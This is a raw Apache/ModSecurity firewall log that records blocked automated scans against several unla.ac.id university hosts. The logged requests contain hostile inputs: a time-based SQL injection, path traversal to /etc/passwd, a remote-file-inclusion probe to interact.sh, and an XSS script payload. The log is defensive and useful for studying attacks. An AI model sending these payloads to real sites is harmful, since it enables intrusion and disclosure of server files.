[Tue Aug 29 11:52:14.665013 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAn0GcgAAAAa"]
[Tue Aug 29 11:52:14.667907 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAnn2BcAAAAe"]
[Tue Aug 29 11:52:14.678996 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAjdQbIAAAAZ"]
[Tue Aug 29 11:52:14.680397 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAnkwgQAAAAY"]
[Tue Aug 29 11:52:14.685605 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAn0GckAAAAa"]
[Tue Aug 29 11:52:14.696914 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAnoOqAAAAAf"]
[Tue Aug 29 11:52:14.713543 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAlIBk0AAAAn"]
[Tue Aug 29 11:52:14.715699 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fsCo-f0AAAoCWFsAAAAB"]
[Tue Aug 29 11:52:14.724832 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAn95-QAAAAD"]
[Tue Aug 29 11:52:14.736883 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAnoOqIAAAAf"]
[Tue Aug 29 11:52:14.736990 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAlUlqoAAAA0"]
[Tue Aug 29 11:52:14.750920 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAnTlNYAAAAA"]
[Tue Aug 29 11:52:14.752081 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAnd3FEAAAAI"]
[Tue Aug 29 11:52:14.759674 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAnoOqMAAAAf"]
[Tue Aug 29 11:52:15.531175 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAlUlqwAAAA0"]
[Tue Aug 29 11:52:15.541568 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAnTlNcAAAAA"]
[Tue Aug 29 11:52:15.558218 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15f8Co-f0AAAfWOMkAAAAL"]
[Tue Aug 29 11:52:15.576136 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAlUlq0AAAA0"]
[Tue Aug 29 11:52:15.576167 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15f8Co-f0AAAni-AIAAAAU"]
[Tue Aug 29 11:52:15.627579 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAfWOMsAAAAL"]
[Tue Aug 29 11:52:15.627836 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/download"] [unique_id "ZO15f8Co-f0AAAnkwgkAAAAY"]
[Tue Aug 29 11:52:15.651775 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAnkwgoAAAAY"]
[Tue Aug 29 11:52:16.547055 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAfWOM0AAAAL"]
[Tue Aug 29 11:52:16.589668 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAnTlNwAAAAA"]
[Tue Aug 29 11:52:16.636660 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/download"] [unique_id "ZO15gMCo-f0AAAjdQbgAAAAZ"]
[Tue Aug 29 11:52:16.637054 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAnTlN0AAAAA"]
[Tue Aug 29 11:52:16.667867 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/download"] [unique_id "ZO15gMCo-f0AAAn95-gAAAAD"]
[Tue Aug 29 11:52:16.669577 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAnTlN4AAAAA"]
[Tue Aug 29 11:52:16.672249 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gMCo-f0AAAjdQbkAAAAZ"]
[Tue Aug 29 11:52:16.715831 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download"] [unique_id "ZO15gMCo-f0AAAnIlp4AAAAV"]
[Tue Aug 29 11:52:16.717399 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAjdQboAAAAZ"]
[Tue Aug 29 11:52:16.722287 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/download"] [unique_id "ZO15gMCo-f0AAAni-AcAAAAU"]
[Tue Aug 29 11:52:17.543967 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gcCo-f0AAAni-AgAAAAU"]
[Tue Aug 29 11:52:17.555655 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAnHQiUAAAAT"]
[Tue Aug 29 11:52:17.678370 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAn40zkAAAAW"]
[Tue Aug 29 11:52:17.687790 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAnjjNgAAAAX"]
[Tue Aug 29 11:52:17.695835 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAnoOqgAAAAf"]
[Tue Aug 29 11:52:17.704898 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAnHQiYAAAAT"]
[Tue Aug 29 11:52:17.717775 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAni-AkAAAAU"]
